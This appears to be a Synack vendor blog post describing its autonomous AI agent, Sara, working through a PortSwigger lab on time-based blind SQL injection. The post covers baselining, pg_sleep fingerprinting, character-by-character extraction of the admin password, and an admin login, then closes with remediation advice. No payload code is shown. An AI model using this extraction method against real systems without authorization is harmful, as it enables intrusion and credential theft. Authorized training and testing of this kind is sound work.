scroll it
Abstract green background from a brilliant mosaic pattern, generative AI.

How Synack’s Autonomous AI Agent Identifies and Exploits a SQL Injection Vulnerability

22
Dec 2025
James Thatcher
0% read

Caption: Portswigger representation of how to approach a SQL injection.

In the following scenario, the target application uses a tracking cookie that is vulnerable to SQL injection. However, the vulnerability is “blind” and does not return any data directly. The agent must use time delays to infer information. The goals for the Synack Autonomous AI agent known as Sara in this exercise are to:

  • Confirm the blind SQL injection vulnerability.
  • Determine the database type.
  • Extract the administrator’s password, character by character.
  • Log in to the application as the administrator.

NOTE: To test the Synack AI Agent, we used this lab from PortSwigger’s Web Security Academy. These are the same exercises that human pentesters use to learn the trade.

Step 1

Before attempting any exploitation, Sara enumerated the application for user controlled input and then moved on to establishing baseline response times across multiple requests to understand normal application behavior. 

Agent thinking:

Agent’s action:


Step 2

Then Sara tested multiple injection points methodically, starting with the category URL parameter before moving to the TrackingId cookie. The agent chose to inject multiple payloads, including the PostgreSQL specific function pg_sleep, a strategic move to simultaneously test for time based vulnerabilities and confirm the backend database was PostgreSQL rather than MySQL or MSSQL.

Agent thinking:

Agent action:

Rather than guessing, the agent tested each input vector and let the evidence guide the investigation confirming the cookie was the vulnerable surface. Sara understood that time based blind injection requires distinguishing deliberate delays from network variance. Without baselines, false positives would be inevitable.

Step 3

The agent confirmed PostgreSQL as the backend by observing which sleep syntax worked. 

Agent thinking:

Agent action:

This informed all subsequent payload construction, the agent now knew to use pg_sleep() rather than MySQL’s SLEEP() or MSSQL’s WAITFOR DELAY.

Step 4.

The agent crafted boolean conditional payloads to prove it could control application behavior based on true/false database conditions.

Agent thinking:

Agent action:

This proved the agent could extract arbitrary information bit-by-bit, the foundation for data exfiltration in blind injection.

Step 5.

Before attempting password extraction, the agent verified the administrator user existed in the users table.

Agent thought:

Agent action:

Agent thought:

Payload logic:

This validated the attack path. Attempting to extract a password for a non-existent user would waste cycles and yield meaningless data.

Step 6.

The agent used binary search logic to efficiently determine password length before character extraction.

Agent thinking:

Agent action:

Agent thinking:

Agent action:

Agent thinking:

Step 7.

The agent then proceeded to extract the administrator password. The first extracted password (deg25iarwwftfv3deivv) failed to login. The agent hypothesized timing variance caused character misreads and re-ran extraction with longer delays.

Agent action:

Agent thinking:

Agent thinking:

Agent action:

Agent thinking:

Agent thinking:

This demonstrates resilience. Rather than declaring failure, the agent diagnosed the likely root cause (network timing noise) and adjusted methodology, a critical capability for real world security testing.

The table below highlights the specific moments where the agent’s initial extraction failed due to network “noise” mimicking a database delay.

In the 1st Attempt, the agent used a 1-second sleep command. With a normal response time of ~0.8s, a valid “hit” should be ~1.8s. However, normal network lag occasionally caused incorrect characters (like ‘e’ and ‘i’) to return in ~1.5s – 1.7s. Because these times were above the agent’s 1.0s threshold, they were accepted as false positives.

In the 2nd Attempt, the agent increased the sleep time to 2 seconds. This pushed valid “hits” to ~2.7s, creating a safe margin that normal network variance could not accidentally reach.

Position1st Attempt (1s delay)2nd Attempt (2s delay)Diagnosis
2e (1.74s)7 (2.74s)False Positive: In the first attempt, a network spike (1.74s) looked like a valid 1s delay. The 2s delay clarified the true character is ‘7’.
18i (1.54s)l (2.75s)False Positive: The ‘i’ response (1.54s) was dangerously close to the threshold. Increasing the delay proved the character was actually ‘l’.

This comparison demonstrates why signal to noise ratio is critical in blind SQL injection. By dynamically increasing the delay, the agent successfully filtered out the network jitter that plagued the first attempt.

Step 8.

With the attack path validated and the administrator verified, Sara transitions from exploitation to documentation. To ensure the engineering team can reproduce and fix the issue, the agent autonomously generates a fully functional proof of concept script.

Agent thinking:

Agent action:

Finally, Sara synthesizes the technical data into a vulnerability report. This includes a detailed description, impact analysis, and specific remediation steps, mirroring the high quality deliverables expected from Security Researchers.

Description

The application is vulnerable to time-based blind SQL injection through the TrackingId cookie. The cookie value is concatenated directly into a PostgreSQL query without proper sanitization or parameterization. An attacker can inject SQL statements using the stacked query syntax (;) combined with PostgreSQL’s pg_sleep() function to cause measurable time delays. By observing response times, an attacker can infer boolean conditions about database contents, allowing extraction of sensitive data character by character.

Impact

An attacker can extract arbitrary data from the database including usernames, passwords, and other sensitive information. This was demonstrated by successfully extracting the administrator password (d7g25iarwwftfv3delvv). With valid credentials, an attacker could gain unauthorized administrative access to the application, potentially leading to full system compromise.”,

Vulnerability Category

SQL Injection

  1. Use parameterized queries (prepared statements) for all database interactions instead of string concatenation. 
  2. Implement input validation to reject unexpected characters in the TrackingId cookie. 
  3. Apply the principle of least privilege to the database user – it should not have access to the users table if not needed for tracking functionality. 
  4. Consider using a Web Application Firewall (WAF) as defense-in-depth. 
  5. Implement rate limiting on requests to slow down time-based extraction attacks.

Key lessons:

1. Autonomous Self-Correction

  • The Context: Standard automated scanners usually stop after a failed attempt or report a false positive. When Sara’s first extracted password (deg25iarwwftfv3deivv) failed to work, the agent didn’t quit.
  • The Lesson: Instead, it diagnosed the root cause, network timing variance “noise” interfering with the character extraction, and autonomously recalibrated its approach by increasing the delay threshold to successfully re-extract the correct credentials (d7g25iarwwftfv3delvv).

2. Intelligent Baselining vs. Blind Fuzzing

  • The Context: The application had a natural latency of ~0.8 seconds. A simple script looking for a 1-second delay may have been plagued by false positives due to this high variance.
  • The Lesson: The agent recognized this environmental constraint before attacking. It calculated that a standard delay was insufficient and dynamically adjusted to a 2-second sleep payload to ensure a statistically significant signal to noise ratio.

3. Outcome-Driven Validation

  • The Context: Blind SQL injection is notorious for false positives because it relies on inferring data from time delays rather than seeing the data directly.
  • The Lesson: Sara went beyond technical confirmation. By taking the extracted password and successfully performing an administrative login, the agent converted a theoretical technical finding into a proven business risk.

Sara demonstrated a complete security testing methodology: establishing baselines, testing multiple attack surfaces, fingerprinting the database, validating conditional logic, enumerating targets, optimizing extraction efficiency, and recovering from errors. 

The entire engagement from initial reconnaissance,  to successful login as administrator, followed a structured, evidence-driven approach that customers should expect from Synack’s autonomous agent.

For more information about Synack’s approach to AI red teaming, dow the Synack Guide to Agentic AI Pentesting